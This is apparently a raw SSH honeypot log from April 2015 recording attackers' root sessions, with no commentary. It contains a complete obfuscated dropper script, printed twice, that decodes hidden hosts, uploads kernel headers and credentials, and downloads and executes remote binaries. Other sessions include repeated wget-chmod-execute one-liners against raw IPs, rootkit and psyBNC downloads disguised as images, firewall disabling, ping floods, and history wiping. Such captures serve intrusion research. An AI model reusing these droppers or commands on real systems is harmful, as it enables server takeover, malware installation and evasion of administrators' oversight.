From 91.81.221.209 8-Apr-2015 11:36:05 ssh2 root w ls history nano test.pl yum install nano apt-get install nano wgte cd .. cd ls cd /tmp ls cd ls cd /tmp ls cd ls cat test.pl ps x history uname -a pro From 78.134.103.209 8-Apr-2015 21:22:13 ssh2 root w ifconfig ls ls -all nano .ssh passwd wget http://teamkid.at.ua/Top.pdf ; perl uname -a cat /proc/cpuinfo PS X From 85.127.167.245 9-Apr-2015 02:15:17 ssh2 root uname -a free -m cat /proc/cpuinfo perl cat /etc/issue apt-get install update yum install update From 23.251.63.56 9-Apr-2015 16:54:29 ssh2 root Exec __host_32__="sEEA+==deadefadcajc+jjjj" __host_64__="sEEA+==deadefadcaih+jjjj" __host_32_2__="sEEA+==cbeadgakaddh+jjjj" __host_64_2__="sEEA+==cbeadgakaddg+jjjj" __host_32_libc__="sEEA+==cbeadgakaddh+jjjj" __host_64_libc__="sEEA+==cbeadgakaddg+jjjj" __download_url__="sEEA+==deadefahbacfb=tyDElww=jbbh" __remote__="cbeadgakadfg+jbbh|cbeadfbacfcagb+jbbh|hhacbdadgeaeb+jbbh|yoyDaoDludlcazCr+jbbh|yoyDaoDludlazCr+jbbh|yoyDasnItlzlzanzx+jbbh|yoyDaoDludlanzx+jbbh" __username__='loxty' __password__='admin' __temp__=/tmp __install_dir__=/usr/local/bin __kernel__=`uname -r|awk -F- '{print $1}'` # select compiler server server(){ __osv_X86_64=`dec 'Ijh_hf'` __osv_AMD64=`dec 'LXOhf'` __os_version_X86_64=`uname -a|grep "$__osv_X86_64"` __os_version_AMD64=`uname -a|grep "$__osv_AMD64"` if [ -f /lib/libc.so.6 ]; then __libc_main=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $1}'` __libc_sub=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $2}'` fi if [ ! -z "$__os_version_X86_64" -o ! -z "$__os_version_AMD64" ] ;then __online=`wget "$__host_64__/check.action?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -` if [ ! -z "$__online" ]; then # __host__=$__host_64__ else __host__=$__host_64_2__ fi if [ -f /lib/libc.so.6 ]; then if [ $__libc_main -le 2 ]; then if [ $__libc_sub -le 5 ]; then __host__=$__host_64_libc__ fi fi fi else __online=`wget "$__host_32__/check.action?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -` if [ ! -z "$__online" ]; then # __host__=$__host_32__ else __host__=$__host_32_2__ fi if [ -f /lib/libc.so.6 ]; then if [ $__libc_main -le 2 ]; then if [ $__libc_sub -le 5 ]; then __host__=$__host_32_libc__ fi fi fi fi } # check md5 md5(){ __data=`echo "$@"` echo -n "$__data"|md5sum|cut -d ' ' -f1 return 0 } # get os version version(){ if [ -f /sbin/modinfo ]; then SYS=`/sbin/lsmod |tail -n 1 | awk ' {print $1} '` echo "`/sbin/modinfo $SYS|grep vermagic|awk -F: '{print $2}'|sed 's/^ *//g'|awk '{print $0}'|sed 's/ /\\\\ /g'`" fi return 0 } checkBuild(){ __build=/lib/modules/`uname -r`/build/ if [ -d $__build ]; then return 1 fi return 0 } # generate header file generate(){ __files=`ls $__build` tar zcfhP "$__temp__/dev.tgz" -C $__build $__files if [ $? -eq 0 ] ;then return 1 fi return 0 } # check header version check(){ __iid=`echo "$@"` if [ ! -z "$__iid" ]; then __result=`wget "$__host__/check.action?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 3 -O - -q` if [ ! -z "$__result" ]; then __code=`echo $__result|awk -F "|" '{print $1}'` __md5=`echo $__result|awk -F "|" '{print $2}'` if [ $__code -eq 1001 ]; then return 1 fi fi fi return 0 } # download build file download(){ __iid=`echo "$@"` if [ ! -z "$__iid" ]; then __url="$__host__/upload/module/$__iid/build.tgz" wget "$__url" -O /tmp/build.tgz -q --connect-timeout=3 -t 3 if [ $? -eq 0 ];then # return 1 fi fi return 0 } download_and_execute(){ wget "$__download_url__" -O /tmp/bin -q --connect-timeout=3 -t 3 if [ $? -eq 0 ];then # chmod +x /tmp/bin /tmp/bin sleep 3 rm -rf /tmp/bin return 1 fi return 0 } # remote compiler code compiler(){ __iid=`echo "$@"` if [ ! -z "$__iid" ]; then __url="$__host__/compiler.action?iid=$__iid&username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__" __result=`wget "$__url" -O - -q --connect-timeout=3 -t 3` if [ ! -z "$__result" ]; then __code=`echo $__result|awk -F "|" '{print $1}'` __md5=`echo $__result|awk -F "|" '{print $2}'` if [ $__code -eq 1001 ]; then return 1 fi fi fi return 0 } # uncompress file uncompress(){ __iid=`echo "$@"` if [ ! -z "$__iid" ]; then if [ ! -d $__temp__/$__iid ]; then mkdir $__temp__/$__iid fi tar zxvf $__temp__/build.tgz -C $__temp__/$__iid if [ $? -eq 0 ] ;then shred -u -z $__temp__/build.tgz return 1 fi fi return 0 } enc(){ echo $@|tr "[.0-9a-zA-Z\/\/\:]" "[a-zA-Z0-9\;-=+*\/]"; } dec(){ echo $@|tr "[a-zA-Z0-9\;-=+*\/]" "[.0-9a-zA-Z\/\/\:]"; } # install file setup(){ __iid=`echo "$@"` if [ ! -z "$__iid" ]; then __bin=`echo "bin"` chmod +x $__temp__/$__iid/$__bin $__temp__/$__iid/$__bin if [ $? -eq 0 ]; then sleep 3 rm -rf $__temp__/$__iid/$__bin return 1 fi fi return 0 } # upload upload(){ rm -f /tmp/mini wget $__host__/upload/mini -O /tmp/mini -q --connect-timeout=3 -t 3 if [ $? -eq 0 ];then # chmod +x /tmp/mini __url=$__host__/submit.action __result=`/tmp/mini --url="$__url" --post="username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__&file=@$__temp__/dev.tgz"` if [ ! -z "$__result" ]; then __code=`echo $__result|awk -F "|" '{print $1}'` __md5=`echo $__result|awk -F "|" '{print $2}'` if [ $__code -eq 1001 ]; then rm -f /tmp/mini return 1 fi fi rm -f /tmp/mini fi return 0 } # main entry main(){ PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin __host_32__=`dec "$__host_32__"` __host_64__=`dec "$__host_64__"` __host_32_2__=`dec "$__host_32_2__"` __host_64_2__=`dec "$__host_64_2__"` __host_32_libc__=`dec "$__host_32_libc__"` __host_64_libc__=`dec "$__host_64_libc__"` __download_url__=`dec "$__download_url__"` __remote__=`dec "$__remote__"` __username__=`dec "$__username__"` __version__=`version` __iid=`md5 "$__version__"` __iid=`echo $__iid|tr [:lower:] [:upper:]` __done=0 if [ ! -d /tmp ]; then mkdir /tmp fi if [ -f /usr/bin/wget ]; then chattr -i /usr/bin/wget chmod +x /usr/bin/wget fi if [ -f /bin/wget ]; then chattr -i /bin/wget chmod +x /bin/wget fi if [ -f /usr/bin/cut ]; then chattr -i /usr/bin/cut chmod +x /usr/bin/cut fi if [ -f /bin/cut ]; then chattr -i /bin/cut chmod +x /bin/cut fi server # select http server check $__iid if [ $? -eq 1 ];then compiler $__iid # remote compiler if [ $? -eq 1 ]; then __done=1 fi else checkBuild if [ $? -eq 1 ];then generate # create header file if [ $? -eq 1 ]; then upload if [ $? -eq 1 ] ;then __done=1 fi rm -rf $__temp__/dev.tgz else if [ -f $__temp__/dev.tgz ]; then rm -rf $__temp__/dev.tgz fi compiler $__iid # remote compiler if [ $? -eq 1 ]; then __done=1 fi fi else compiler $__iid # remote compiler if [ $? -eq 1 ]; then __done=1 fi fi fi if [ $__done -eq 1 ]; then download $__iid if [ $? -eq 1 ]; then uncompress $__iid if [ $? -eq 1 ]; then setup $__iid if [ $? -ne 1 ]; then __done=0 fi else __done=0 fi else __done=0 fi fi if [ $__done -eq 0 ]; then download_and_execute fi rm -rf $__temp__/$__iid } main ls -la /var/run/mount.pid exit $? Exec __host_32__="sEEA+==deadefadcajc+jjjj" __host_64__="sEEA+==deadefadcaih+jjjj" __host_32_2__="sEEA+==cbeadgakaddh+jjjj" __host_64_2__="sEEA+==cbeadgakaddg+jjjj" __host_32_libc__="sEEA+==cbeadgakaddh+jjjj" __host_64_libc__="sEEA+==cbeadgakaddg+jjjj" __download_url__="sEEA+==deadefahbacfb=tyDElww=jbbh" __remote__="cbeadgakadfg+jbbh|cbeadfbacfcagb+jbbh|hhacbdadgeaeb+jbbh|yoyDaoDludlcazCr+jbbh|yoyDaoDludlazCr+jbbh|yoyDasnItlzlzanzx+jbbh|yoyDaoDludlanzx+jbbh" __username__='loxty' __password__='admin' __temp__=/tmp __install_dir__=/usr/local/bin __kernel__=`uname -r|awk -F- '{print $1}'` # select compiler server server(){ __osv_X86_64=`dec 'Ijh_hf'` __osv_AMD64=`dec 'LXOhf'` __os_version_X86_64=`uname -a|grep "$__osv_X86_64"` __os_version_AMD64=`uname -a|grep "$__osv_AMD64"` if [ -f /lib/libc.so.6 ]; then __libc_main=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $1}'` __libc_sub=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $2}'` fi if [ ! -z "$__os_version_X86_64" -o ! -z "$__os_version_AMD64" ] ;then __online=`wget "$__host_64__/check.action?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -` if [ ! -z "$__online" ]; then # __host__=$__host_64__ else __host__=$__host_64_2__ fi if [ -f /lib/libc.so.6 ]; then if [ $__libc_main -le 2 ]; then if [ $__libc_sub -le 5 ]; then __host__=$__host_64_libc__ fi fi fi else __online=`wget "$__host_32__/check.action?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -` if [ ! -z "$__online" ]; then # __host__=$__host_32__ else __host__=$__host_32_2__ fi if [ -f /lib/libc.so.6 ]; then if [ $__libc_main -le 2 ]; then if [ $__libc_sub -le 5 ]; then __host__=$__host_32_libc__ fi fi fi fi } # check md5 md5(){ __data=`echo "$@"` echo -n "$__data"|md5sum|cut -d ' ' -f1 return 0 } # get os version version(){ if [ -f /sbin/modinfo ]; then SYS=`/sbin/lsmod |tail -n 1 | awk ' {print $1} '` echo "`/sbin/modinfo $SYS|grep vermagic|awk -F: '{print $2}'|sed 's/^ *//g'|awk '{print $0}'|sed 's/ /\\\\ /g'`" fi return 0 } checkBuild(){ __build=/lib/modules/`uname -r`/build/ if [ -d $__build ]; then return 1 fi return 0 } # generate header file generate(){ __files=`ls $__build` tar zcfhP "$__temp__/dev.tgz" -C $__build $__files if [ $? -eq 0 ] ;then return 1 fi return 0 } # check header version check(){ __iid=`echo "$@"` if [ ! -z "$__iid" ]; then __result=`wget "$__host__/check.action?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 3 -O - -q` if [ ! -z "$__result" ]; then __code=`echo $__result|awk -F "|" '{print $1}'` __md5=`echo $__result|awk -F "|" '{print $2}'` if [ $__code -eq 1001 ]; then return 1 fi fi fi return 0 } # download build file download(){ __iid=`echo "$@"` if [ ! -z "$__iid" ]; then __url="$__host__/upload/module/$__iid/build.tgz" wget "$__url" -O /tmp/build.tgz -q --connect-timeout=3 -t 3 if [ $? -eq 0 ];then # return 1 fi fi return 0 } download_and_execute(){ wget "$__download_url__" -O /tmp/bin -q --connect-timeout=3 -t 3 if [ $? -eq 0 ];then # chmod +x /tmp/bin /tmp/bin sleep 3 rm -rf /tmp/bin return 1 fi return 0 } # remote compiler code compiler(){ __iid=`echo "$@"` if [ ! -z "$__iid" ]; then __url="$__host__/compiler.action?iid=$__iid&username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__" __result=`wget "$__url" -O - -q --connect-timeout=3 -t 3` if [ ! -z "$__result" ]; then __code=`echo $__result|awk -F "|" '{print $1}'` __md5=`echo $__result|awk -F "|" '{print $2}'` if [ $__code -eq 1001 ]; then return 1 fi fi fi return 0 } # uncompress file uncompress(){ __iid=`echo "$@"` if [ ! -z "$__iid" ]; then if [ ! -d $__temp__/$__iid ]; then mkdir $__temp__/$__iid fi tar zxvf $__temp__/build.tgz -C $__temp__/$__iid if [ $? -eq 0 ] ;then shred -u -z $__temp__/build.tgz return 1 fi fi return 0 } enc(){ echo $@|tr "[.0-9a-zA-Z\/\/\:]" "[a-zA-Z0-9\;-=+*\/]"; } dec(){ echo $@|tr "[a-zA-Z0-9\;-=+*\/]" "[.0-9a-zA-Z\/\/\:]"; } # install file setup(){ __iid=`echo "$@"` if [ ! -z "$__iid" ]; then __bin=`echo "bin"` chmod +x $__temp__/$__iid/$__bin $__temp__/$__iid/$__bin if [ $? -eq 0 ]; then sleep 3 rm -rf $__temp__/$__iid/$__bin return 1 fi fi return 0 } # upload upload(){ rm -f /tmp/mini wget $__host__/upload/mini -O /tmp/mini -q --connect-timeout=3 -t 3 if [ $? -eq 0 ];then # chmod +x /tmp/mini __url=$__host__/submit.action __result=`/tmp/mini --url="$__url" --post="username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__&file=@$__temp__/dev.tgz"` if [ ! -z "$__result" ]; then __code=`echo $__result|awk -F "|" '{print $1}'` __md5=`echo $__result|awk -F "|" '{print $2}'` if [ $__code -eq 1001 ]; then rm -f /tmp/mini return 1 fi fi rm -f /tmp/mini fi return 0 } # main entry main(){ PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin __host_32__=`dec "$__host_32__"` __host_64__=`dec "$__host_64__"` __host_32_2__=`dec "$__host_32_2__"` __host_64_2__=`dec "$__host_64_2__"` __host_32_libc__=`dec "$__host_32_libc__"` __host_64_libc__=`dec "$__host_64_libc__"` __download_url__=`dec "$__download_url__"` __remote__=`dec "$__remote__"` __username__=`dec "$__username__"` __version__=`version` __iid=`md5 "$__version__"` __iid=`echo $__iid|tr [:lower:] [:upper:]` __done=0 if [ ! -d /tmp ]; then mkdir /tmp fi if [ -f /usr/bin/wget ]; then chattr -i /usr/bin/wget chmod +x /usr/bin/wget fi if [ -f /bin/wget ]; then chattr -i /bin/wget chmod +x /bin/wget fi if [ -f /usr/bin/cut ]; then chattr -i /usr/bin/cut chmod +x /usr/bin/cut fi if [ -f /bin/cut ]; then chattr -i /bin/cut chmod +x /bin/cut fi server # select http server check $__iid if [ $? -eq 1 ];then compiler $__iid # remote compiler if [ $? -eq 1 ]; then __done=1 fi else checkBuild if [ $? -eq 1 ];then generate # create header file if [ $? -eq 1 ]; then upload if [ $? -eq 1 ] ;then __done=1 fi rm -rf $__temp__/dev.tgz else if [ -f $__temp__/dev.tgz ]; then rm -rf $__temp__/dev.tgz fi compiler $__iid # remote compiler if [ $? -eq 1 ]; then __done=1 fi fi else compiler $__iid # remote compiler if [ $? -eq 1 ]; then __done=1 fi fi fi if [ $__done -eq 1 ]; then download $__iid if [ $? -eq 1 ]; then uncompress $__iid if [ $? -eq 1 ]; then setup $__iid if [ $? -ne 1 ]; then __done=0 fi else __done=0 fi else __done=0 fi fi if [ $__done -eq 0 ]; then download_and_execute fi rm -rf $__temp__/$__iid } main ls -la /var/run/mount.pid exit $? From 157.7.152.198 10-Apr-2015 02:40:37 ssh2 root Exec wget -c http://62.210.209.198/59&&chmod 777 59 From 157.7.152.198 10-Apr-2015 07:33:41 ssh2 root Exec wget -c http://62.210.209.198/49&&chmod 777 49 From 87.243.2.38 10-Apr-2015 12:26:45 ssh2 root ls -l cd / ls -l cd vmware ls -l clear exit From 59.188.237.12 11-Apr-2015 07:59:01 ssh2 root Exec uname -m From 222.186.129.101 11-Apr-2015 12:37:41 ssh2 root Exec echo test&killall *&cat /proc//\cpuinfo From 82.135.211.82 11-Apr-2015 22:58:39 ssh2 root Exec help From 157.7.238.124 12-Apr-2015 13:17:25 ssh2 root Exec wget -c http://62.210.209.198/79&&chmod 777 79 From 93.190.139.152 12-Apr-2015 19:40:35 ssh2 root Exec cat /etc/issue ; uname -a ; echo === ; cat /proc/cpuinfo | grep "model name" ; echo === ; ifconfig ; echo === ; echo === ; gcc ; df -h From 107.182.141.25 13-Apr-2015 06:01:33 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a06 chmod +x a06 ./a06 From 210.75.225.72 13-Apr-2015 08:49:41 ssh2 root Exec id From 141.85.252.213 13-Apr-2015 15:57:23 ssh2 root ls mc ls cd / ls uname -a ls -la less lan.doc more lan.doc cat lan.doc pwd cd /etc ls ls -lA w who ? help ps aux netstat -t ls /bin echo funny echo funny > pif.txt ls -la ls pif.txt touch pif.txt exit From 157.7.152.183 13-Apr-2015 23:28:53 ssh2 root Exec wget -c http://62.210.209.198/49&&chmod 777 49 wget -c http://62.210.209.198/49&&chmod 777 From 93.190.139.152 14-Apr-2015 04:21:57 ssh2 root Exec cat /etc/issue ; uname -a ; echo === ; cat /proc/cpuinfo | grep "model name" ; echo === ; ifconfig ; echo === ; echo === ; gcc ; df -h cat /etc/issue uname -a echo === cat /proc/cpuinfo | grep echo === ifconfig echo === gcc df -h From 157.7.238.124 14-Apr-2015 09:15:01 ssh2 root Exec wget -c http://62.210.209.198/76&&chmod 777 76 wget -c http://62.210.209.198/76&&chmod 777 From 184.164.71.41 14-Apr-2015 12:35:27 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a07 chmod +x a07 ./a07 #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a07 From 96.44.189.101 14-Apr-2015 14:08:05 ssh2 root export HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0 w who unset HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0 id w df -h ls -a uname -a cat /etc/issue cat /etc/*release cat /etc/*rele* ls -a /etc/ |grep pwd ls a- / ls -a / nano test.pl ls -a w uptime who From 96.44.189.101 14-Apr-2015 19:01:09 ssh2 root export HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0 unset HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0 ls -a uptime yum apt-get apt-get install gcc make gcc apt-get install nano apt-get install libssl apt-get install zlib1g-dev apt-get install libpam0g-dev apt-get install g++ ls -a /bin gcc pwd df -h cd /var d /usr/save ls ls -al cd .. pwd ls -a cd root ls ls -a mbox ls -a locate network.pl apt-get install bin-utils sudo apt-get install libssl id uptime who wget ap ps -x ls -al ls -a /usr/lib/libc id uptime who cd /usr/local/include/ ls -a cd /usr ls cd nsmail s ls -a pwd cd .xauth mkdir ". " apt-get install mkdir mkdir ". " pwd ls ps -aux ls -al /usr/bin/startx who whoami id uptime netstat -an |grep 22 apt-get install netstat netstat -tap cd .. cd /root rm -rf .bash_history touch .bash_history id ls -al cat .bash_history From 78.191.192.98 16-Apr-2015 05:12:37 ssh2 root e w cat /etc/redhat-release ethtool eth0 apt-get install ethtool From 198.15.131.137 16-Apr-2015 05:51:35 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08 #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 From 78.191.192.98 16-Apr-2015 14:58:45 ssh2 root w cat /etc/redhat-release From 194.150.168.95 17-Apr-2015 20:17:09 ssh2 root export HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0 cat /etc/passwd id uname a ping oung ping ls -al From 221.229.166.28 18-Apr-2015 01:10:13 ssh2 root exit ls .a .rav8 ls -al .rav8 ls -al .gftp cat .bash_history exit From 176.10.99.202 18-Apr-2015 20:42:29 ssh2 root uname -a yum install gcc exit From 78.183.248.143 19-Apr-2015 21:07:49 ssh2 root ls perl regas.pl ls ping -f 192.168.1.1 ping 192.168.1.1 service iptables stop cd /root ls chmod +x * ls sudo apt-get install gcc apt-get install perl ls reboot /sbin/reboot ./gtk wget http://download1778.mediafire.com/96n5b95l2b0g/bs19jfqbyfovq15/88udp wget -c http://download1778.mediafire.com/96n5b95l2b0g/bs19jfqbyfovq15/88udp reboot power off sudo shutdown -h now sudo /var/log$ sudo shutdown -h now cd /var/log$ sudo shutdown -h now ls Mail ./Mail perl perl test1.pl sudo perl test1.pl cd /root ls last -f /var/log/utmp wget http://download1778.mediafire.com/96n5b95l2b0g/bs19jfqbyfovq15/88udp ks-post.log cd /ks-post.log From 78.183.248.143 20-Apr-2015 02:00:53 ssh2 root reboot cd /usr/bin/ ls wget -r -nH ftp://192.168.0.101:/myscript/* -P /root/l chmod -R 755 /root/* ls /usr/bin/wget -r -nH ftp://192.168.0.101:/myscript/* -P /root/l cd /usr/bin/wget -r -nH ftp://192.168.0.101:/myscript/* -P /root/l ls From 78.183.248.143 20-Apr-2015 06:53:57 ssh2 root sudo poweroff sudo reboot sudo halt sudo init 6 shutdown --help help man shutdown /usr/bin/dbus-send --system --print-reply --dest="org.freedesktop.ConsoleKit" /org/freedesktop/ConsoleKit/Manager org.freedesktop.ConsoleKit.Manager.Stop cd /usr/bin/dbus-send --system --print-reply --dest="org.freedesktop.ConsoleKit" /org/freedesktop/ConsoleKit/Manager org.freedesktop.ConsoleKit.Manager.Stop sudo ufw status ls sudo ufw disable sudo iptables-save > $HOME/firewall.txt ls rm -rf OpenOffice.org1.0 rm -rf reglas test1.pl reglas.pl vmware ideb mbox ls rm -rf lan.doc simplefirewall-stable ls From 5.9.156.238 20-Apr-2015 11:47:01 ssh2 root w unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG export HISTFILE=/dev/null export HISTSIZE=0 export HISTFILESIZE= last -w ps -ef exit From 5.157.122.103 20-Apr-2015 16:40:05 ssh2 root w uname -a ifconfig cat /proc/cpuinfo passwd password pass history wget http://commentteam.ucoz.com/bash.tgz ls yum -y install glibc.i686 apt-get install glibc.i386 wget http://commentteam.ucoz.com/bash.tgz From 162.220.24.141 21-Apr-2015 12:12:21 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09 chmod +x a09 ./a09 #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09 chmod +x a09 ./a09 From 5.157.122.103 21-Apr-2015 17:05:25 ssh2 root w ifconfig cat /proc/cpuinfo history passwd From 38.68.17.240 22-Apr-2015 16:37:05 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08 #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08 From 78.170.117.212 22-Apr-2015 22:23:49 ssh2 root w history ls last vl From 162.220.27.170 23-Apr-2015 02:56:07 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a07 chmod +x a07 ./a07 #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a07 chmod +x a07 ./a07 Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a07 chmod +x a07 ./a07 #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a07 chmod +x a07 ./a07 From 78.191.207.161 23-Apr-2015 08:09:57 ssh2 root w history cd top c From 107.182.141.25 23-Apr-2015 23:34:11 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a06 chmod +x a06 ./a06 #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a06 chmod +x a06 ./a06 From 49.213.22.22 24-Apr-2015 08:35:17 ssh2 root yum -y install perl-Net-SSLeay wget http://prdownloads.sourceforge.net/webadmin/webmin_1.690_all.deb echo 'nameserver 8.8.8.8' > /etc/resolv.conf su - apt-get install sudo yum install sudo visudo sudo -i sudo apt-get update sudo apt-get upgrade sudo apt-get install nano sudo apt-get update sudo apt-get install nano cat /etc/sysconfig/network-scripts/ifcfg-eth0 vi /etc/sysconfig/network-scripts/ifcfg-eth0 From 222.186.21.209 24-Apr-2015 13:28:21 ssh2 root shutdown -r now yum install phpMyAdmin sudo apt-get install xrdp sudo apt-get install ubuntu-desktop echo "gnome-session --session=ubuntu-2d" > ~/.xsession sudo apt-get update cd /tmp wget http://download.fedoraproject.org/pub/epel/6/i386/epel-release-6-8.noarch.rpm rpm -ivh epel-release-6-8.noarch.rpm yum search phpmyadmin yum -y install phpmyadmin yum install mysql-server mysql mysql_secure_installation vi /etc/httpd/conf.d/phpMyAdmin.conf apt-get update apt-get install dnsutils nslookup google.com reboot From 49.213.22.22 24-Apr-2015 18:21:25 ssh2 root wget http://prdownloads.sourceforge.net/webadmin/webmin_1.690_all.deb dpkg -i webmin_1.690_all.deb -Y echo $PATH export PATH=$PATH:/bin:/usr/local/bin apt-get install dnsutils y echo 'nameserver 8.8.8.8' > /etc/resolv.conf yum -y install perl-Net-SSLeay wget http://prdownloads.sourceforge.net/webadmin/webmin_1.690_all.deb -c apt-get update apt-get upgrade apt-get install nano nano /etc/ssh/sshd_config apt-get install dropbear nano /etc/default/dropbear wget http://download.virtualbox.org/virtualbox/4.3.16/VirtualBox-4.3-4.3.16_95972_el6-1.i686.rpm --continue yum -y update rm /var/cpanel/hulkd/enabled rw init=/bin/bash umount /dev/sda1 /etc/init.d/mysql restart yum -y install http://download.webmin.com/download/yum/webmin-1.740-1.noarch.rpm yum update -y yum install gcc make rpm-build autoconf.noarch zlib-devel pam-devel From 58.218.199.49 24-Apr-2015 23:14:29 ssh2 root apt-get purge apache2* bind9* samba* apt-get update apt-get upgrade From 114.215.176.153 25-Apr-2015 04:07:33 ssh2 root apt-get install nano apt-get install xorg lxde-core tightvncserver setenforce 0 wget http://soluslabs.com/installers/solusvm/install chmod 755 install ./install iptables -A INPUT -p tcp --dport 5353 -j wget http://soluslabs.com/installers/solusvm/install chmod 755 install From 211.151.182.212 25-Apr-2015 23:39:49 ssh2 root /sbin/ifconfig | grep inet -wc cat /etc/hosts last From 5.254.149.125 26-Apr-2015 04:32:53 ssh2 root last cd ls -a cat .bash_history cat /etc/issue cd /var/tmp ls -a wget cd /dev/shm ls mkdir ., wget w wget http://soft.hackrz.org/bnc/psy-autologin-autorun.tgz tar xzvf psy-autologin-autorun.tgz rm -rf psy-autologin-autorun.tgz mv psy-autologin-autorun .z cd .z chmod +x * ./autorun & ./start wget http://soft.hackrz.org/bnc/psy-autologin-autorun.tgz curl ls -a ./au bash ./autorun cd .. rm -rf .z From 62.112.193.131 26-Apr-2015 09:25:57 ssh2 root unset HISTFILE HISTSAVE w ps -ax cat /proc/cpuinfo netstat -at pwd ls -al cd .ss sl -al s -al ls -al cd .ssh ls -al pwd wget http://y2000.hu/dreams/myr00tk1t.tgz tar zxvf myr00tk1t.tgz rm -rf myr00tk1t.tgz cd myr00tk1t ./setup cd /tmp ls -l pwd wget curl fetch cat /etc/issue uname uname -a cat /etc/issue wget ls -al apt-get apt-get remove wget ls -al cat .bash_history ps -ax ls -al cat ftp.openbsd.org cd ftp.openbsd.org pwd ls -al exit From 219.151.8.155 26-Apr-2015 13:28:23 ssh2 root netstat -an ps -aux uname -a chattr +i /etc/init.d/iptables cd /usr/bin/ ls From 172.162.13.28 27-Apr-2015 09:51:17 ssh2 root w ifconfig cat /proc/cpuinfo passwd pwd passwd yum uname -a cd ~ passwd ls cd /tmp ls cd /var/tmp ls wget tar perl yum apt-get apt-get install tar tar From 172.162.13.28 27-Apr-2015 14:44:21 ssh2 root cat /etc/*release From 117.79.132.226 27-Apr-2015 20:25:29 ssh2 root uptime netstat -atnp cd /tmp wget From 188.99.115.169 28-Apr-2015 00:30:29 ssh2 root passwd w uname -a From 79.113.190.252 28-Apr-2015 05:23:33 ssh2 root sudo su passwd w , uptime cat /proc/cpuinfo ps x w id ifconfig history cd /var/tmp ls -a mkdir " " From 117.79.132.226 28-Apr-2015 06:44:31 ssh2 root wget http://192.168.70.129/fdcservery uptime uname -a From 79.113.190.252 28-Apr-2015 15:09:41 ssh2 root cd /var/tmp From 117.79.132.226 28-Apr-2015 17:03:33 ssh2 root chmod 0755 /usr/bin/chattr From 88.85.253.230 28-Apr-2015 20:02:45 ssh2 root passwd ls pass wget wget http://root-arhive.at.ua/psybnc/psybnc.jpg ifconfig wget http://root-arhive.at.ua/psybnc/psybnc.jpg wget http://root-arhive.serveftp/scanner/gosh.jpg cd ls http://root-arhive.at.ua/psybnc/psybnc.jpg wget -c passwd Y cd/bash -Y bash From 82.137.11.110 29-Apr-2015 00:55:49 ssh2 root wget -Y free uid wget http://root-arhive.at.ua/psybnc/psybnc-linux.jpg uname -a c -c wget -c -Y wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe wget -Y on exit wget -Y on -Y on onhive.serveftp/scanner/gosh.jpg -Y on wget 